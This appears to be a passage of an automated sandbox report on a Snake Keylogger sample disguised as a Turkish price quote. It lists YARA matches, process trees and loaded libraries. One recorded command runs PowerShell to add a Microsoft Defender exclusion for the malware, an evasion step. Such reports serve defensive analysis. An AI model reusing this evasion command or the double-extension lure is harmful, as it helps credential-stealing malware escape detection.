                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8C9D80_2_09F8C9D8
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F82C680_2_09F82C68
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8AE780_2_09F8AE78
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8AE690_2_09F8AE69
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8B2B00_2_09F8B2B0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8C5A00_2_09F8C5A0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8D4980_2_09F8D498
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F804480_2_09F80448
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F804390_2_09F80439
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F8072F0_2_09F8072F
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_09F866380_2_09F86638
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 0_2_129021780_2_12902178
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 6_2_018839F06_2_018839F0
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 6_2_01883E096_2_01883E09
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeCode function: 6_2_018829EC6_2_018829EC
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 1520
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1444231240.0000000009CD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000000.1396944301.0000000000DBC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIQbz.exe: vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1435443149.0000000004B73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1434287481.000000000377C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1432365642.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000000.00000002.1445503652.000000000D4D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe, 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeBinary or memory string: OriginalFilenameIQbz.exe: vs fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 6.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4ebbe18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4e34ff8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0.2.fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.4bb5e20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000006.00000002.1629459951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 00000000.00000002.1435443149.0000000004BB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7472, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe PID: 7696, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@9/11@1/1
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe.logJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7696
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\heoNtRrAUmycrUH
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hsmlomam.xlm.ps1Jump to behavior
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 1520
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
